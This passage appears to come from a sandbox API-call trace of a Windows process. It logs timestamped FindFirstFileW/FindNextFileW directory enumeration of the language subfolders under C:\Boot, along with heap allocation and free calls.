lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.972] FindNextFileW (in: hFindFile=0x728288, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x209949ab, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.972] FindClose (in: hFindFile=0x728288 | out: hFindFile=0x728288) returned 1 [0156.972] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.972] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="fr-FR", cAlternateFileName="")) returned 1 [0156.972] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.972] FindFirstFileW (in: lpFileName="C:\\Boot\\fr-FR\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727cc8 [0156.973] FindNextFileW (in: hFindFile=0x727cc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010bc12, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ade2b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.973] FindNextFileW (in: hFindFile=0x727cc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2096e751, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13558, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.973] FindNextFileW (in: hFindFile=0x727cc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.973] FindNextFileW (in: hFindFile=0x727cc8, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ade2b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39fe447, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb3a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.973] FindClose (in: hFindFile=0x727cc8 | out: hFindFile=0x727cc8) returned 1 [0156.973] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.973] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="hr-HR", cAlternateFileName="")) returned 1 [0156.973] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.973] FindFirstFileW (in: lpFileName="C:\\Boot\\hr-HR\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728148 [0156.974] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48a0490, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.974] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.974] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12b60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.974] FindClose (in: hFindFile=0x728148 | out: hFindFile=0x728148) returned 1 [0156.974] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.974] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0156.974] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.974] FindFirstFileW (in: lpFileName="C:\\Boot\\hu-HU\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727d08 [0156.975] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010c5ad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5c171b, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.975] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x13360, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.975] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.975] FindNextFileW (in: hFindFile=0x727d08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5c171b, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf39d81d8, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb398, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.975] FindClose (in: hFindFile=0x727d08 | out: hFindFile=0x727d08) returned 1 [0156.975] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.975] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="it-IT", cAlternateFileName="")) returned 1 [0156.975] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.975] FindFirstFileW (in: lpFileName="C:\\Boot\\it-IT\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727d88 [0156.976] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010ccad, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5d8ab4, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.976] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48a0490, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2123921c, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12d58, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.976] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.976] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48a0490, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5d8ab4, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf30285aa, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xb1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.977] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0156.977] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.977] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0156.977] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.977] FindFirstFileW (in: lpFileName="C:\\Boot\\ja-JP\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727d88 [0156.978] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xa010d0c0, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xef5ed6c6, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.978] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48c6596, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x21212f9a, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.978] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.978] FindNextFileW (in: hFindFile=0x727d88, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5ed6c6, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf300233f, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa798, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.978] FindClose (in: hFindFile=0x727d88 | out: hFindFile=0x727d88) returned 1 [0156.978] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.978] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0156.978] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.978] FindFirstFileW (in: lpFileName="C:\\Boot\\ko-KR\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x728148 [0156.979] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48c6596, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xef5fc210, ftLastWriteTime.dwHighDateTime=0x1d3273d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.979] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x211c6af1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x10560, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.979] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 1 [0156.979] FindNextFileW (in: hFindFile=0x728148, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xef5fc210, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2fdc0d7, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0xa7a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="memtest.exe.mui", cAlternateFileName="MEMTES~1.MUI")) returned 0 [0156.979] FindClose (in: hFindFile=0x728148 | out: hFindFile=0x728148) returned 1 [0156.979] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.979] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5a3, dwReserved1=0xffffb6d2, cFileName="lt-LT", cAlternateFileName="")) returned 1 [0156.980] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfffe) returned 0x44d0050 [0156.980] FindFirstFileW (in: lpFileName="C:\\Boot\\lt-LT\\*", lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x727e08 [0156.980] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0156.980] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0156.980] FindNextFileW (in: hFindFile=0x727e08, lpFindFileData=0x34ff800 | out: lpFindFileData=0x34ff800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x2117a634, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12760, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0156.980] FindClose (in: hFindFile=0x727e08 | out: hFindFile=0x727e08) returned 1 [0156.980] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x44d0050 | out: hHeap=0x6a0000) returned 1 [0156.980] FindNextFileW (in: hFindFile=0x728108, lpFindFileData=0x34ffa7c | out: lpFindFileData=0x34ffa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc48ec805, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc48ec805, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc48ec805, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, 